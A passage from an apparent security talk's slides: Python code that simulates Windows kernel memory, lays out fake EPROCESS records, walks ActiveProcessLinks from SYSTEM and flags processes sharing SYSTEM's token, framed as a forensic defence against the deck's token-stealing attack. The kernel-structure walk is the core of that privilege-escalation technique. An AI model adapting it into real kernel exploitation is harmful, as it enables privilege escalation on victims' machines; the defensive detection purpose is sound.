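        self._check(addr, 8)
        return struct.unpack_from("<Q", self.buf, addr - MEM_BASE)[0]

    def poke(self, addr, value):
        self._check(addr, 8)
        struct.pack_into("<Q", self.buf, addr - MEM_BASE, value)

    def write_bytes(self, addr, data):
        self._check(addr, len(data))
        self.buf[addr - MEM_BASE:addr - MEM_BASE + len(data)] = data


def build_process_list(mem, processes):
    """Lay out one fake EPROCESS per (pid, name, token) tuple and link them in a circle."""
    addrs = [FIRST_EPROCESS + i * EPROCESS_STRIDE for i in range(len(processes))]
    for i, (pid, name, token) in enumerate(processes):
        base = addrs[i]
        mem.poke(base + OFF_UNIQUE_PROCESS_ID, pid)
        mem.poke(base + OFF_TOKEN, token)
        mem.write_bytes(base + OFF_IMAGE_FILE_NAME, name.encode()[:15].ljust(15, b"\0"))
        # Flink/Blink point at the neighbours' ActiveProcessLinks fields, not at their bases.
        mem.poke(base + OFF_ACTIVE_PROCESS_LINKS, addrs[(i + 1) % len(addrs)] + OFF_ACTIVE_PROCESS_LINKS)
        mem.poke(base + OFF_ACTIVE_PROCESS_LINKS + 8, addrs[(i - 1) % len(addrs)] + OFF_ACTIVE_PROCESS_LINKS)
    mem.poke(PS_INITIAL_SYSTEM_PROCESS, addrs[0])   # SYSTEM's EPROCESS is the list head
    return addrs


def walk_active_process_links(peek, system_eprocess):
    """Walk the list forward from SYSTEM. Each Flink is turned back into an EPROCESS base by
    subtracting the ActiveProcessLinks offset (CONTAINING_RECORD), so every other field is
    then read at its documented offset from that base."""
    head_links = system_eprocess + OFF_ACTIVE_PROCESS_LINKS
    procs = []
    link = head_links
    while True:
        eproc = link - OFF_ACTIVE_PROCESS_LINKS
        pid = peek(eproc + OFF_UNIQUE_PROCESS_ID)
        token = peek(eproc + OFF_TOKEN) & EX_FAST_REF_MASK
        procs.append((pid, eproc, token))
        link = peek(link)          # follow Flink
        if link == head_links:     # circular list: back at SYSTEM means we are done
            break
    return procs


def find_shared_tokens(peek, system_eprocess):
    """Defender's check: a non-SYSTEM process whose Token object equals SYSTEM's, once the
    reference-count bits are masked off, has had its token replaced."""
    procs = walk_active_process_links(peek, system_eprocess)
    system_token = next(t for pid, _, t in procs if pid == 4)
    return [(pid, eproc) for pid, eproc, t in procs if pid != 4 and t == system_token]


def demo():
    mem = FakeKernelMemory()
    # Constructed sample: PID 1234 already carries SYSTEM's token object (same pointer,
    # different refcount bits), the state the deck's attack leaves behind.
    build_process_list(mem, [
        (4, "System", 0xffffbe87f081e62f),
        (612, "smss.exe", 0xffffbe87f0a0c067),
        (1234, "notepad.exe", 0xffffbe87f081e62a),
    ])
    system_eprocess = mem.peek(PS_INITIAL_SYSTEM_PROCESS)              # slide 28, step 3
    assert mem.peek(system_eprocess + OFF_UNIQUE_PROCESS_ID) == 4      # slide 29 sanity check
    return find_shared_tokens(mem.peek, system_eprocess)


if __name__ == "__main__":
    print(demo())
```

Masking before comparing matters: the two copies of a shared token differ only in their reference-count bits, so a raw pointer compare misses the match. Against real memory the same walk and check work unchanged when `peek` is a function that reads 8 bytes at a kernel address, which is how forensic tooling spots a process whose token has been swapped.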
  • 41. Next Talk: Exploiting LOLDriver Vulnerabilities – DC214 – 7.13.23
  • 42. Thanks! Russell Sanford, xort@sploit.online